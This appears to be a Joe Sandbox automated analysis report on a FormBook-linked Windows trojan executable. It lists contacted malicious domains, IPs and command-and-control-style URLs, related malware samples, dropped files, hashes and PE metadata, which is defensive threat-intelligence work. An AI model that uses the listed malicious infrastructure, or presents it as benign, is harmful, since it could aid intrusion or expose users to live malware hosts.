http://schemas.mi	explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.venitro.com/gy14/www.tulisanemas.com	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://powerpoint.office.comcember	explorer.exe, 00000006.00000002.4106973998.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1678060196.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://img.sedoparking.com	explorer.exe, 00000006.00000002.4111127345.000000001170F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000584F000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.grow-services.net/api/grow/soap/#addMeasurementT	z2______________________________.exe	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000006.00000002.4101465452.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000006.00000000.1670704175.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4102494791.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1674455372.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.theanhedonia.com/gy14/www.beautyloungebydede.online	explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.typography.netD	z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.224.212.212	www.theanhedonia.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
104.21.9.22	www.batuoe.com	United States	13335	CLOUDFLARENETUS	true
154.86.173.213	www.smnyg.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
3.33.130.190	venitro.com	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1392182
Start date and time:	2024-02-14 15:15:23 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	z2______________________________.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@14/6@12/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 94 Number of non-executed functions: 292
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:16:11	API Interceptor	1x Sleep call for process: z2______________________________.exe modified
15:16:12	API Interceptor	32x Sleep call for process: powershell.exe modified
15:16:15	API Interceptor	7845416x Sleep call for process: explorer.exe modified
15:16:57	API Interceptor	8150609x Sleep call for process: control.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.224.212.212	file.exe	Get hash	malicious	LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT	Browse	soclaiebn.xyz/PhpMyAdmin/
	22#U0415.exe	Get hash	malicious	FormBook	Browse	www.theanhedonia.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58
	RFQ-T56797W_1.xlsx	Get hash	malicious	FormBook, NSISDropper	Browse	www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41
	GCeHcfCef8.exe	Get hash	malicious	FormBook	Browse	www.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs
	Audit_Confirmation_pdf.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
	SWIFT_LETTER_A1OzGLOB0NH2.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?GxoHR=VBjPa4VPhFxDNPj&_ZApkb=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlhHtHXyyNqk4
104.21.9.22	REQUERIMIENTO_DE_COTIZACION.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.batuoe.com/gy14/?mdsdgF4=OxUWq4qJziKrKF2QUT+3VkXdtndMquKVSz0uWKIZ3KtG35y0CyAOaPR4t2bL9MT4uZmm&AZCTzd=pR-0Vtbh5tjtqDz0
	7rnsrSZaIV.exe	Get hash	malicious	FormBook	Browse	www.batuoe.com/gy14/?AnQ=E0GdkDQhXJ&S4zl=OxUWq4qJziKrKF2QUT+3VkXdtndMquKVSz0uWKIZ3KtG35y0CyAOaPR4t2bL9MT4uZmm
	18#U041a.exe	Get hash	malicious	FormBook	Browse	www.batuoe.com/gy14/?1bj=OxUWq4r9zCPbX1rkIj+3VkXdtndMquKVSz0uWKIZ3KtG35y0CyAOaPR4t17xtdzA0+Hh&EB7=OVeHB848Mx
	z1BOLETODEPAGAMENTO.exe	Get hash	malicious	FormBook	Browse	www.batuoe.com/gy14/?svnx8p=hBgh3n4h&Ah=OxUWq4qJziKrKF2QUT+3VkXdtndMquKVSz0uWKIZ3KtG35y0CyAOaPR4t2Xyxt/45f639V0zmQ==
154.86.173.213	z16REQUISITODECOTA#U00c7#U00c3Opdf.exe	Get hash	malicious	FormBook	Browse	www.smnyg.com/gy14/?K8k0=AbsdpdtPmPNTPhn0&kJBt=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G
	18#U041a.exe	Get hash	malicious	FormBook	Browse	www.smnyg.com/gy14/?1bj=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&EB7=OVeHB848Mx
	z26PAGE.exe	Get hash	malicious	FormBook	Browse	www.smnyg.com/gy14/?VrR=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&lZQ=7nPdNxp82
	#U041a#U0412#U0418#U0422#U0410#U041d#U0426#U0418#U042f.exe	Get hash	malicious	FormBook	Browse	www.smnyg.com/gy14/?VTf8=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&jrTLmd=TTU4Of9XSBeheT
	10#U0417.exe	Get hash	malicious	FormBook	Browse	www.smnyg.com/gy14/?DtxD=e48KmGM7ZYCDTKr9ixAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaCfubLxAP0fB&HTc=wZL4NF305tQpmd
	z16BOLETOBANC#U00c1RIO.exe	Get hash	malicious	FormBook	Browse	www.smnyg.com/gy14/?jFNl2=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&Wpg=Ohh8jXO85
91.195.240.19	FedEx_24021747701.exe	Get hash	malicious	FormBook	Browse	www.baojinbi.org/nk2s/
	FedEx_2402657477.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.baojinbi.org/nk2s/
	Confirm PDF.exe	Get hash	malicious	FormBook	Browse	www.botfolk.com/he2a/?Bz=zWssSGhvHD0IddJ/x3Tq1Ev2x/0xlBJewIrJ1hCQRiACuML200C4Nhhu9X+Q50Pa8Wcm&r6=GbtltDz0Q
	http://Tw1tter.com/Dionspizza	Get hash	malicious	Unknown	Browse	www.tw1tter.com/Dionspizza
	Quotation following specifications.exe	Get hash	malicious	FormBook	Browse	www.rmh641.com/derk/
	PO-H23-0006384.exe	Get hash	malicious	FormBook	Browse	www.baojinbi.org/nk2s/
	00890021123000.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.lotus247.live/dgip/
	gG5dwIYGbEQZBt7.exe	Get hash	malicious	FormBook	Browse	www.mineralsandminingme.com/cz30/
	qUGJZ4Ih2v.exe	Get hash	malicious	FormBook	Browse	www.tulisanemas.com/gy14/?Ylg8g4Ap=TVW95z/K+TdEWJ4R6SI+edXNZ9WzZwQpiu6hZuLz+N2V81RbOedsJ4kc/Ya0jRV/q+1J&Thct=Dxlpdbhpx
	jYLXwtSJOP.exe	Get hash	malicious	FormBook	Browse	www.naples.beauty/gy14/?_nuDR=Zf34QfZHJB&lJExfNm=Go8vTrHyn9C+pkkNtyKSgIW+IdqdbLSyuJQv9ABJU2ERxA5ov3fqO1PElBHpyV65EOzA

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
parkingpage.namecheap.com	FedEx_24021747701.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	FedEx_2402657477.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	Confirm PDF.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	http://Tw1tter.com/Dionspizza	Get hash	malicious	Unknown	Browse	91.195.240.19
	Quotation following specifications.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	PO-H23-0006384.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	00890021123000.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	gG5dwIYGbEQZBt7.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	qUGJZ4Ih2v.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	jYLXwtSJOP.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
www.batuoe.com	jYLXwtSJOP.exe	Get hash	malicious	FormBook	Browse	172.67.141.17
	REQUERIMIENTO_DE_COTIZACION.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.9.22
	SecuriteInfo.com.Trojan.Packed2.46190.15325.19908.exe	Get hash	malicious	FormBook	Browse	172.67.141.17
	7rnsrSZaIV.exe	Get hash	malicious	FormBook	Browse	104.21.9.22
	18#U041a.exe	Get hash	malicious	FormBook	Browse	104.21.9.22
	z1BOLETODEPAGAMENTO.exe	Get hash	malicious	FormBook	Browse	104.21.9.22
	#U041a#U0412#U0418#U0422#U0410#U041d#U0426#U0418#U042f.exe	Get hash	malicious	FormBook	Browse	172.67.141.17
	z16BOLETOBANC#U00c1RIO.exe	Get hash	malicious	FormBook	Browse	104.21.9.22
www.smnyg.com	z16REQUISITODECOTA#U00c7#U00c3Opdf.exe	Get hash	malicious	FormBook	Browse	154.86.173.213
	18#U041a.exe	Get hash	malicious	FormBook	Browse	154.86.173.213
	z26PAGE.exe	Get hash	malicious	FormBook	Browse	154.86.173.213
	#U041a#U0412#U0418#U0422#U0410#U041d#U0426#U0418#U042f.exe	Get hash	malicious	FormBook	Browse	154.86.173.213
	10#U0417.exe	Get hash	malicious	FormBook	Browse	154.86.173.213
	z16BOLETOBANC#U00c1RIO.exe	Get hash	malicious	FormBook	Browse	154.86.173.213
www.theanhedonia.com	22#U0415.exe	Get hash	malicious	FormBook	Browse	103.224.212.212

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DXTL-HKDXTLTseungKwanOServiceHK	zWo0OXF3K0.elf	Get hash	malicious	Mirai	Browse	154.94.101.188
	x86.elf	Get hash	malicious	Mirai	Browse	156.235.242.45
	TjdM2wcgSz.elf	Get hash	malicious	Mirai	Browse	156.235.217.35
	kyZgCPIvwM.elf	Get hash	malicious	Mirai	Browse	156.235.142.186
	gR1DW6Zm1N.elf	Get hash	malicious	Mirai	Browse	156.235.142.177
	5FEizg5Api.elf	Get hash	malicious	Mirai	Browse	154.208.98.241
	huhu.x86_64.elf	Get hash	malicious	Mirai	Browse	154.214.177.48
	iinno2JfXz.elf	Get hash	malicious	Mirai	Browse	154.207.188.19
	UDABfsLPdO.elf	Get hash	malicious	Mirai	Browse	156.235.142.160
	z16REQUISITODECOTA#U00c7#U00c3Opdf.exe	Get hash	malicious	FormBook	Browse	154.86.173.213
SEDO-ASDE	FedEx_24021747701.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	FedEx_2402657477.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	Confirm PDF.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Banka odeme havale makbuzu 20240213 TL950000900.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	http://Tw1tter.com/Dionspizza	Get hash	malicious	Unknown	Browse	91.195.240.19
	Quotation following specifications.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	rBCPcomprobante.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	PO-H23-0006384.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	Banka odeme havale makbuzu 20240209 TL950000900.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	Banka odeme havale makbuzu 20240209 TL950000900.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
CLOUDFLARENETUS	nTransfer_EAncia_.pif.exe	Get hash	malicious	FormBook	Browse	162.159.130.90
	Sgrlaw Tuesday February 2024 .html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://national-buildings.atlassian.net/wiki/external/Mjg5MmQ3OWRkMmM4NDhmZThhNWY2Yzk5ZDM0ODEzYmU	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	DHL STATEMENT 009##22.exe	Get hash	malicious	AgentTesla	Browse	104.21.57.121
	Sign.2024-01.exe	Get hash	malicious	Remcos	Browse	172.67.190.93
	bank payment.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Scan_InfoDoc_PO2.pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	ekstre.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	Dekonet.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
TRELLIAN-AS-APTrellianPtyLimitedAU	Confirm PDF.exe	Get hash	malicious	FormBook	Browse	103.224.212.214
	rBCPcomprobante.exe	Get hash	malicious	FormBook	Browse	103.224.212.213
	http://yaatde.com	Get hash	malicious	Unknown	Browse	103.224.182.206
	Purchase_Order_PA056223.pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.216
	jYLXwtSJOP.exe	Get hash	malicious	FormBook	Browse	103.224.212.214
	AL5052H32.xls	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.212.215
	SsQblB4e3Y.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	103.224.182.210
	sample.exe	Get hash	malicious	Unknown	Browse	103.224.182.251
	http://iyfbodn.com/?dn=roku.tv&pid=9POT3387I&pbsubid=5b078e79-5ba1-4b65-9896-e4ac7e82995c&noads=http%3A%2F%2Fiyfbodn.com%2F%3Fdn%3Droku.tv%26skipskenzo%3Dtrue	Get hash	malicious	Unknown	Browse	103.224.182.250
	http://unhaka.com	Get hash	malicious	Unknown	Browse	103.224.182.16
AMAZONEXPANSIONGB	nTransfer_EAncia_.pif.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	Scan_InfoDoc_PO2.pdf.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	#U0111#U01a1n h#U00e0ng m#U1edbi pdf.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	https://today-currently-2-13-24.weeblysite.com/	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://yahooooooo-102760.weeblysite.com/	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://atthome-100749.weeblysite.com/	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://anajsjsj0-0992.weeblysite.com/	Get hash	malicious	Unknown	Browse	52.223.40.198
	https://att-108598-109150.weeblysite.com/	Get hash	malicious	Unknown	Browse	52.223.40.198
	pdfcentral (1).exe	Get hash	malicious	Unknown	Browse	3.33.220.150
	Banka odeme havale makbuzu 20240213 TL950000900.exe	Get hash	malicious	FormBook	Browse	3.33.130.190

Process:	C:\Users\user\Desktop\z2______________________________.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.338280278779315
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4DfE4KnKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDfHKnYHKh3oPtHo6hAHKD
MD5:	B7B1DB4A3581F2EF35606A093262795C
SHA1:	E1B20DDC19E7395D473CA266DC44502B3A75B5FF
SHA-256:	8962CDB7AEC0431D8B6BAF57D1FA3E3072D7534A7F8D254A9E6F7BE43616A5DE
SHA-512:	FBE1C9240ADC462BDD900032CB19284341AAC94072731E0C827DEC1CAC2127B52D4C305CA85BD52B2685853C98E2E63E9557209B82E4230A4BF210DD7D454A6E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZmUyus:lGLHyIFKL3IZ2KRH9Ouggs
MD5:	78BCAB051335215A0B70C28294CCC8F5
SHA1:	C02D388FE21FDB7D836856545A6B2124E29862D7
SHA-256:	1AE100BFD49A786F082E14F95BFD4BB1EA5C78E5C75B259C4DE28693680EAEFC
SHA-512:	FDE69BE00A5FAAD1DC1EA57E96C7387FB4A4AE52D55FDEEE97499B77B001FD77E38C85CB85E649229B277CEF50FC69E4F01BB2DD0BCCD4AEE96C8C82D2E442ED
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njr35n0a.uec.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_of4w4113.tma.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtpihgp4.fq0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycfrse5d.cvs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.952527977501769
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	z2______________________________.exe
File size:	619'520 bytes
MD5:	cd8edca1396524d51a71ca38b7f5273f
SHA1:	d8a092cd9c6d4034e1dae4c850169e38ba46ff7b
SHA256:	1d5692148172354fedfed8e9e8f368a59a8c2c6372c7885e80087d9ba5ad76c1
SHA512:	921c1e74fe46209a20515c7c31bbb972d671e691ddb204d5ba0c69d8ebdd2030eeac2a267db067d0157751e2e11cce3fc68bbab79406e671f255528ad8b310d0
SSDEEP:	12288:5ekeQ5vziy6BQgKPZn3HB78Ujj0nGDRql6w2lgHiKeee9JMALH/6V6Cs2:5ekriy6CzB3CnGo/CKeee9J1S
TLSH:	C4D41220129CE3A3CD1913FE5853174A63F6A3BBBA91E6CABF04145D4DB3B07A741267
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\|..e..............0..N...$......fl... ........@.. ....................................`................................

File Icon


Icon Hash:	4db870cccce0f055

Static PE Info

General

Entrypoint:	0x496c66
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65CAE37C [Tue Feb 13 03:35:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
